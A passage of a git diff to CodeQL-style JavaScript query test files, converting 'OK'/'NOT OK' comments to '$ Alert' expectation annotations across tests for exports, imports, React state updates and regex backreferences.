OK - throwerWithParam(42, 87); // NOT OK - throwerIndirect(42); // OK, but still flagged due to complexity + notAPlainThrower1(42); // $ Alert + notAPlainThrower2(42); // $ Alert + notAPlainThrower3(42); // $ Alert + thrower(42); + throwerArrow(42); + throwerCustom(42); + throwerWithParam(42, 87); // $ Alert + throwerIndirect(42); // OK - but still flagged due to complexity }); function sum2() { @@ -128,14 +125,14 @@ function sum2() { return result; } -// OK + sum2(1, 2, 3); const $ = function (x, arr) { console.log(x, arr); }; -// OK + async function tagThing(repoUrl, directory) { await $`git clone ${repoUrl} ${directory}`; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js index 583daac6ccca..6965cab8bae0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js @@ -1,25 +1,20 @@ var o = { A: function f(x) { 'use strict'; - // BAD - if (!(this instanceof arguments.callee)) - // BAD - return new arguments.callee(x); - // BAD - console.log(f.caller); - // BAD - this.y = f.arguments; + if (!(this instanceof arguments.callee)) // $ Alert + return new arguments.callee(x); // $ Alert + console.log(f.caller); // $ Alert + this.y = f.arguments; // $ Alert this.x = x; } }; var D = class extends function() { - // BAD - return arguments.callee; + return arguments.callee; // $ Alert } {}; function g() { - // OK + return arguments.caller.length; } @@ -27,8 +22,7 @@ function g() { 'use strict'; function h() { var foo = Math.random() > 0.5 ? h : arguments; - // BAD - return foo.caller; + return foo.caller; // $ Alert } })(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js index 65a61da7a616..6ea353f77b5e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js @@ -37,7 +37,7 @@ function foo1() { const foobar = 4; const data = {name: name, date: date}; - writer.emit("Name: ${name}, Date: ${date}.", data); // OK + writer.emit("Name: ${name}, Date: ${date}.", data); - writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // NOT OK - `foobar` is not in `data`. + writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // $ Alert - `foobar` is not in `data`. } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js index a68f3ad35f9b..7a61221e8a90 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js @@ -1,6 +1,5 @@ function idMaker(){ var index = 0; while(true) - // NOT OK - yield index++; + yield index++; // $ Alert } diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js index b4645ff98881..d7799470bc2f 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js @@ -20,7 +20,7 @@ k.foo; var l = require('./l'); l.foo(); -l.bar(); // not OK +l.bar(); // $ Alert require('./m').foo; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js index cacb69772fe9..7eb45e2cfabb 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js @@ -10,10 +10,10 @@ if (cond) { } if (cond) { - mod1.call(); // OK: `mod1` is `./b`, which exports `call` + mod1.call(); // OK - `mod1` is `./b`, which exports `call` } else { - mod1.bar; // OK: `mod1` is `./c`, which exports `bar` - mod2.bar; // NOT OK: `mod2` is `./b`, which does not export `call` + mod1.bar; // OK - `mod1` is `./c`, which exports `bar` + mod2.bar; // $ Alert - `mod2` is `./b`, which does not export `call` } module.exports = {}; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js index 83bd3009a8ba..61a2663a7ad6 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js @@ -1,2 +1,2 @@ -exports.a = 23; // OK -exports = 56; // NOT OK +exports.a = 23; +exports = 56; // $ Alert diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js index c650950972b5..f02b2cdaa4f7 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = module.exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js index 67a979faef7a..f3c20feff45f 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` module.exports = exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js index 18089f129a6e..d7269a450093 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js @@ -1,4 +1,4 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = {}; exports.a = 23; module.exports = exports; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js index 93448cd102f9..78ea98c06292 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query exports = module.exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js index 679437bd5b9d..e638381c2690 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query module.exports = exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js index c24fd42b6dd9..2a5f22cb49d8 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js @@ -1,2 +1,2 @@ -module.exports.a = 23; // OK -module.exports = 56; // OK +module.exports.a = 23; +module.exports = 56; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js index 4b93bb8f7f40..9361a968088c 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js @@ -1,4 +1,4 @@ module.exports = exports; -exports = {}; // NOT OK, reassignment above should appear below +exports = {}; // $ Alert - reassignment above should appear below exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js index d91971d6f519..cf5eb12ff0ac 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js @@ -1,4 +1,4 @@ var e = {}; module.exports = e; -exports = e; // OK +exports = e; exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js b/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js index 9a561d4a340d..8023c7511b64 100644 --- a/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js @@ -4,19 +4,19 @@ exports.baz = 56; exports.alert = 72; /*global bar*/ -bar(); // OK +bar(); baz = function() {}; -baz(); // OK +baz(); -alert(); // OK +alert(); -exports.isNaN = isNaN // OK +exports.isNaN = isNaN || function(x) { return x !== x; }; exports.someGlobal = 100; -someGlobal(); // OK +someGlobal(); window.otherGlobal = function() {}; exports.otherGlobal = otherGlobal; -otherGlobal(); // OK +otherGlobal(); diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js index 750fbe53712d..9e6301b5bb38 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js @@ -1,2 +1,2 @@ -require('baz'); // OK: declared in ../../package.json (though not in ./package.json) -require('mod'); // OK: found in ../node_modules/mod \ No newline at end of file +require('baz'); // OK - declared in ../../package.json (though not in ./package.json) +require('mod'); // OK - found in ../node_modules/mod \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js index ba7d097a552e..abc92ca81047 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js @@ -1,2 +1,2 @@ -require('baz'); // OK: declared in ../package.json -require('mod'); // OK: found in ./node_modules/mod \ No newline at end of file +require('baz'); // OK - declared in ../package.json +require('mod'); // OK - found in ./node_modules/mod \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js index 878d59a100d4..b5d9982bd4e0 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js @@ -1,11 +1,11 @@ -require('fs'); // OK: there is an externs file for it -require('other'); // NOT OK: there is an externs file, but it is not a Node.js module -require('foo'); // OK: declared as a dependency -require('bar/sub'); // OK: 'bar' declared as a dependency -require('./local'); // OK: local import -require('/global'); // OK: global import -require('mod'); // NOT OK -require('undeclared'); // NOT OK -require('jade!./template.jade'); // OK: WebPack loader -require('imports?$=jquery!./m.js'); // OK: WebPack shim -require('react'); // OK: peer dependency \ No newline at end of file +require('fs'); // OK - there is an externs file for it +require('other'); // $ Alert - there is an externs file, but it is not a Node.js module +require('foo'); // OK - declared as a dependency +require('bar/sub'); // OK - 'bar' declared as a dependency +require('./local'); // OK - local import +require('/global'); // OK - global import +require('mod'); // $ Alert +require('undeclared'); // $ Alert +require('jade!./template.jade'); // OK - WebPack loader +require('imports?$=jquery!./m.js'); // OK - WebPack shim +require('react'); // OK - peer dependency \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js index ae78d6699400..b11ad45452ef 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js @@ -1 +1 @@ -require('m'); // OK: no package.json, so assume incomplete code and don't flag \ No newline at end of file +require('m'); // OK - no package.json, so assume incomplete code and don't flag \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js b/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js index c379b0ba530e..4ab65194e8df 100644 --- a/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js +++ b/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js @@ -1,27 +1,24 @@ var o = { x: 1, y: 2, z: 3 }; -// OK: toplevel for-in +// OK - toplevel for-in for (var p in o); function f() { - // OK: local variable + // OK - local variable for (var p in o); } function g() { - // NOT OK: property - var q = [], i = 0; + var q = [], i = 0; // $ Alert - property for (q[i++] in o); } function h() { - // NOT OK: global - for (p in o); + for (p in o); // $ Alert - global } function k() { - // NOT OK: captured - for (var p in o); + for (var p in o); // $ Alert - captured return function() { return p; }; @@ -30,15 +27,13 @@ function k() { function l() { var p; function m() { - // NOT OK: captured - for (p in o); + for (p in o); // $ Alert - captured } } function m() { - // NOT OK: global - for (p of o); + for (p of o); // $ Alert - global } -// OK: toplevel +// OK - toplevel for (p of o); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js index 577fc79d5879..efe3e1cd14b0 100644 --- a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js +++ b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js @@ -1,5 +1,4 @@ -// NOT OK -function sum(xs, start) { +function sum(xs, start) { // $ Alert if (arguments.length < 2) start = 0; @@ -10,7 +9,7 @@ function sum(xs, start) { return sum; } -// OK + function sum(xs, start) { if (typeof start === 'undefined') start = 0; @@ -22,7 +21,7 @@ function sum(xs, start) { return sum; } -// OK + function sum(xs, _start) { var start = arguments.length < 2 ? _start : 0; diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js index 835818f144d7..9e87ae3819bc 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js @@ -1,7 +1,7 @@ class C1 extends React.Component { upd8() { this.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -9,7 +9,7 @@ class C1 extends React.Component { class C2 extends React.Component { upd8() { this.setState((prevState) => { - counter: prevState.counter + 1 // OK + counter: prevState.counter + 1 }); } } @@ -18,7 +18,7 @@ class C3 extends React.Component { upd8() { var app = this; app.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -26,7 +26,7 @@ class C3 extends React.Component { class C4 extends React.Component { upd8() { this.setState({ - counter: this.state.foo // NOT OK + counter: this.state.foo // $ Alert }); } } @@ -34,7 +34,7 @@ class C4 extends React.Component { class C5 extends React.Component { upd8() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } } @@ -42,13 +42,13 @@ class C5 extends React.Component { class C7 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } @@ -56,13 +56,13 @@ class C7 extends React.Component { class C8 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo + 1 // NOT OK + foo: this.state.foo + 1 // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo + 1 // NOT OK + foo: this.state.foo + 1 // $ Alert }); } } @@ -70,13 +70,13 @@ class C8 extends React.Component { class C9 extends React.Component { upd8a() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } upd8b() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } } @@ -84,14 +84,14 @@ class C9 extends React.Component { class C10 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo, // NOT OK - bar: this.state.bar // NOT OK, but ignored because it is safe in practice + foo: this.state.foo, // $ Alert }); + bar: this.state.bar // OK - ignored because it is safe in practice } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } @@ -100,13 +100,13 @@ class C11 extends React.Component { upd8a() { var self = this; self.setState({ - foo: self.state.foo // NOT OK + foo: self.state.foo // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js index f3c488d38b62..28cd077964f6 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js +++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js @@ -1,9 +1,9 @@ // update variants React.createClass({ render: function() { - this.setState({}); // NOT OK - this.replaceState({}); // NOT OK - this.forceUpdate({}); // NOT OK + this.setState({}); // $ Alert + this.replaceState({}); // $ Alert + this.forceUpdate({}); // $ Alert return
    } }); @@ -14,8 +14,8 @@ class MyClass1 extends React.Component { super(props); } render() { - this.indirectUpdate(); // NOT OK - this.veryIndirectUpdate(); // NOT OK + this.indirectUpdate(); // $ Alert + this.veryIndirectUpdate(); // $ Alert return
    } @@ -34,24 +34,24 @@ class MyClass1 extends React.Component { // definiteness variants React.createClass({ render: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert }, componentDidUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, shouldComponentUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, componentWillUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } } }); @@ -63,11 +63,11 @@ class MyClass2 extends React.Component { } componentWillUpdate() { - this.definiteIndirectUpdate(); // NOT OK + this.definiteIndirectUpdate(); // $ Alert if (cond) { - this.definiteIndirectUpdate(); // OK + this.definiteIndirectUpdate(); } - this.indefiniteIndirectUpdate(); // OK + this.indefiniteIndirectUpdate(); return
    } @@ -86,7 +86,7 @@ class MyClass2 extends React.Component { React.createClass({ render: function() { var app = this; - app.setState({}); // NOT OK + app.setState({}); // $ Alert return
    } }); @@ -105,7 +105,7 @@ React.createClass({ // eslint examples React.createClass({ componentDidUpdate: function() { - this.setState({ // NOT OK + this.setState({ // $ Alert name: this.props.name.toUpperCase() }); }, @@ -115,7 +115,7 @@ React.createClass({ }); React.createClass({ componentWillUpdate: function() { - this.setState({ // NOT OK + this.setState({ // $ Alert name: this.props.name.toUpperCase() }); }, @@ -138,7 +138,7 @@ class Search extends React.Component { render() { return ( - // NOT OK + // $ Alert ); } } @@ -147,25 +147,25 @@ class Search extends React.Component { class MyClass3 extends React.Component { constructor(props) { super(props); - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentDidUnmount() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getDefaultProps() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getInitialState() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentWillUnmount() { - this.setState({}); // OK + this.setState({}); } componentWillMount() { - this.setState({}); // OK + this.setState({}); } componentDidMount() { - this.setState({}); // OK + this.setState({}); } } @@ -184,8 +184,8 @@ class MyClass4 extends React.Component { var doUpdate4 = () => this.myUpdate(); doUpdate4(); } - doUpdate1(); // NOT OK - doUpdate2(); // NOT OK - doUpdate3(); // NOT OK + doUpdate1(); // $ Alert + doUpdate2(); // $ Alert + doUpdate3(); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 6db5702e2fcf..acb79317790e 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -4,11 +4,11 @@ class C1 extends React.Component { this.setState({ writtenInSetState: 42 }); - this.state.writtenInOtherMethod; // OK - this.state.notWritten; // NOT OK - this.state.notWrittenButReadInChain; // NOT OK - this.state.writtenDirectly; // OK - this.state.writtenInSetState; // OK + this.state.writtenInOtherMethod; + this.state.notWritten; // $ Alert + this.state.notWrittenButReadInChain; // $ Alert + this.state.writtenDirectly; + this.state.writtenInSetState; } @@ -23,16 +23,16 @@ class C2 extends React.Component { s.writtenWhenEscaped = 42; } f(this.state); - this.state.writtenWhenEscaped; // OK - this.state.notWrittenWhenEscaped; // NOT OK, but ignored to avoid FP above + this.state.writtenWhenEscaped; + this.state.notWrittenWhenEscaped; // OK - ignored to avoid FP above } } class C3 extends React.Component { constructor() { - this.state.writtenThrougExternalPropertyAccess; // OK - this.state.notWrittenThrougExternalPropertyAccess; // NOT OK + this.state.writtenThrougExternalPropertyAccess; + this.state.notWrittenThrougExternalPropertyAccess; // $ Alert } } @@ -44,24 +44,24 @@ class C4 extends React.Component { return { writtenInUnknownInitializerObject: 42 }; } this.state = f(); - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } class C5 extends React.Component { constructor(x) { this.state = x; - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } new C5({writtenInUnknownInitializerObject: 42}); React.createClass({ render: function() { - this.state.writtenInKnownInitializerObject; // OK - this.state.notWrittenInKnownInitializerObject; // NOT OK + this.state.writtenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ Alert return
    ; }, getInitialState: function() { @@ -74,8 +74,8 @@ React.createClass({ function f(){ return { writtenInUnknownInitializerObject: 42 }; } - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above return
    ; }, getInitialState: function() { @@ -86,8 +86,8 @@ React.createClass({ class C6 extends React.Component { constructor(x) { Object.assign(this.state, {writtenInObjectAssign: 42}); - this.state.writtenInObjectAssign; // OK - this.state.notWrittenInObjectAssign; // NOT OK, but ignored to avoid FP above + this.state.writtenInObjectAssign; + this.state.notWrittenInObjectAssign; // OK - ignored to avoid FP above } } @@ -96,8 +96,8 @@ class C6 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenSetState; // OK - this.state.notWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenSetState; + this.state.notWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -107,7 +107,7 @@ class C7 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenInSetState; // OK + this.state.writtenInSetState; this.setState(f); } } @@ -120,8 +120,8 @@ class C8 extends React.Component { function g() { return { writtenInSetState: 42 } } - this.state.writtenInSetState; // OK - this.state.notInWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenInSetState; + this.state.notInWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -131,8 +131,8 @@ class C9 extends React.Component { function f() { return "readThroughUnknownDynamicPropertyAccess"; } this.state[f()] = 42; - this.state.writtenThroughUnknownDynamicPropertyAccess; // OK - this.state.notWrittenThroughUnknownDynamicPropertyAccess; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownDynamicPropertyAccess; + this.state.notWrittenThroughUnknownDynamicPropertyAccess; // OK - ignored to avoid FP above } } @@ -141,15 +141,15 @@ class C10 extends React.Component { constructor() { var x = { writtenThroughUnknownSpreadAccess: 42 }; this.state = { ...x }; - this.state.writtenThroughUnknownSpreadAccess; // OK - this.state.notWrittenThroughUnknownSpreadAccess// NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownSpreadAccess; + this.state.notWrittenThroughUnknownSpreadAccess// OK - ignored to avoid FP above } } React.createClass({ render: function() { - this.state.writtenThroughMixin; // OK - this.state.notWrittenThroughMixin; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughMixin; + this.state.notWrittenThroughMixin; // OK - ignored to avoid FP above return

    Hello

    ; }, @@ -163,6 +163,6 @@ class C11 extends React.Component { } otherMethod() { - this.state.writeIn_getDerivedStateFromProps; // OK + this.state.writeIn_getDerivedStateFromProps; } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d71aa7136da9..d2ff35967673 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ class C1 extends React.Component { constructor() { - this.state.readDirectly = 42; // OK - this.state.readInChain = {}; // OK - this.state.readInOtherMethod = {}; // OK - this.state.notRead = 42; // NOT OK + this.state.readDirectly = 42; + this.state.readInChain = {}; + this.state.readInOtherMethod = {}; + this.state.notRead = 42; // $ Alert this.state.readDirectly; this.state.readInChain.foo; } @@ -18,7 +18,7 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // NOT OK + this.state.readWhenEscaped = 42; // $ Alert f(this.state); } } @@ -26,8 +26,8 @@ class C2 extends React.Component { class C3 extends React.Component { constructor() { - this.state.readThrougExternaPropertyAccess = 42; // OK - this.state.notReadThrougExternaPropertyAccess = 42; // NOT OK + this.state.readThrougExternaPropertyAccess = 42; + this.state.notReadThrougExternaPropertyAccess = 42; // $ Alert } } @@ -36,8 +36,8 @@ new C3().state.readThrougExternaPropertyAccess; class C4 extends React.Component { constructor() { function f() { return "readThroughUnknownDynamicPropertyAccess"; } - this.state.readThroughUnknownDynamicPropertyAccess = 42; // OK - this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughUnknownDynamicPropertyAccess = 42; + this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // $ OK - ignored to avoid FP above this.state[f()]; } @@ -46,15 +46,15 @@ class C4 extends React.Component { class C5 extends React.Component { constructor() { - this.state.readThroughSpreadOperator = 42; // OK + this.state.readThroughSpreadOperator = 42; ({...this.state}); } } React.createClass({ render: function() { - this.state.readThroughMixin = 42; // OK - this.state.notReadThroughMixin = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughMixin = 42; + this.state.notReadThroughMixin = 42; // $ OK - ignored to avoid FP above return

    Hello

    ; }, @@ -68,7 +68,7 @@ class C6 extends React.Component { } constructor() { - this.state.readIn_getDerivedStateFromProps = 42; // OK + this.state.readIn_getDerivedStateFromProps = 42; } } diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js index 2ac332dfb38d..83fd7871d4ed 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js @@ -1,9 +1,9 @@ -/\1(abc)/; // NOT OK -/(a\1c)/; // NOT OK -/(ab)\2(c)/; // NOT OK -/(?:ab)\1(c)/; // NOT OK +/\1(abc)/; // $ Alert +/(a\1c)/; // $ Alert +/(ab)\2(c)/; // $ Alert +/(?:ab)\1(c)/; // $ Alert /(abc)\1/; /]*>((?:(?=([^<]+))\2|<(?!tpl\b[^>]*>))*?)<\/tpl>/; -/\k(?\w+)/; // NOT OK -/(?<=\1(.))a/; // OK -/(?<=(.)\1)a/; // NOT OK, but not currently flagged +/\k(?\w+)/; // $ Alert +/(?<=\1(.))a/; +/(?<=(.)\1)a/; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js index b2199e311374..7cf1ff3629b5 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js @@ -1,4 +1,3 @@ -// OK + /(.*?)a(?!(a+)b\2)/; -// NOT OK -/(.*?)a(?!(a+)b)\2(.*)/; +/(.*?)a(?!(a+)b)\2(.*)/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js index 59114b90c54a..942331c5453c 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js @@ -9,5 +9,5 